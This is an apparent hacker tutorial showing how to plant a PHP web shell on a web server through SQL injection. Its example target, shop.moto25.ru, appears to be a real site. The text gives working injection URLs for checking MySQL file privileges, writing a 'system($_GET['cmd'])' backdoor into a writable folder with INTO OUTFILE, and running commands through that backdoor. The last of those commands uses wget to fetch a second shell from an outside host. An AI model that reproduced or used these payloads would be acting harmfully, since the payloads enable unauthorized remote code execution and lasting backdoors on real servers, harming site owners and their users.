Shell Uploading Via SQL Injection

In this I will show you how to upload a shell via SQLi.

This method is useful when you have admin info and can't upload anything, or when you have admin info but you can't find admin login and so on.

But this method is very rare!

Anyways let's start with our tutorial...

Things we will need:

1)  Your shell source in .txt format (I will use  http://www.sh3ll.org)
2)  Basic SQLi skill

So let's say you injected our site like this:

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,3,4--

Now you have admin info, you logged in and you failed uploading a shell.
Now our method comes to point.
Remember what column you should use. (Mine one will be 3)

Type in your vuln. column "user" and at the end "from mysql.user" so URL would be like:

http://shop.moto25.ru/news.php? newsnomber=-999+union+select+1,2,user,4+from+mysql.user--

NOTE: If you get an error after this you can't use this method.gg

You should get what is the current user for the site.

moto25_moto25

Good. Now remember that you will need it.

Now we check users file privilege.


In your column type: "group_concat(user,0x3a,file_priv)"

http://shop.moto25.ru/news.php? newsnomber=-999+union+select+1,2,group_concat(user,0x3a,file_priv),4+from+mysql.us er--

Now you should get all users and their privileges

root:Y,root:Y,apache:N,moto25_moto25:Y

Now our user was "moto25_moto25"...
That means we can make files on server.
Let's go to the next step.

To create a file into a server you need to find sites full path.



To do that you must cause an error, hopefully that error would give us our sites path.

We got ours:

/var/www/vhost/moto25/data/www/moto25.ru/

After that we must find writeable folder in our server.
Just browse around or scan it with Acunetix.
Usually public_html folder is writeable.
For our example I used

http://shop.moto25.ru/equip/

So spawning our shell is easy as 1,2,3..
Let's get back at our injection.

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,3,4--

Our column should be our php line.
In there we type:

" system($_GET['cmd']); ?>"

NOTE: Quotation marks are required

All other columns should be "null"

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null--

And at the end we use "INTO OUTFILE" function.

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null INTO OUTFILE--

Now we use site's full path and writeable folder:

/var/www/vhost/moto25/data/www/moto25.ru/equip/

Now

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null INTO OUTFILE /var/www/vhost/moto25/data/www/moto25.ru/equip/--

And our file name and extension.

http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null," system($_GET['cmd']); ?>",null INTO OUTFILE "/var/www/vhost/moto25/data/www/moto25.ru/equip/phpcmd.php"--

Now, our shell should be spawned.
We now check if our file is created.

http://shop.moto25.ru/equip/phpcmd.php






You should get something like:

Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/phpcmd.php on line 1

That means we have our file created! Yeh…….!
We check if it is working:

http://shop.moto25.ru/equip/phpcmd.php?cmd=ls -la

We can see all files in current directory!
And simple command to download a shell:

http://shop.moto25.ru/equip/phpcmd.php?cmd=wget www.sh3ll.org/egy.txt -O egy.php

Explanation:

wget - Downloads textual file on our server (egy.txt). -O - Renames it to egy.php

Game over!
I hope you learned something more interesting ..

-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r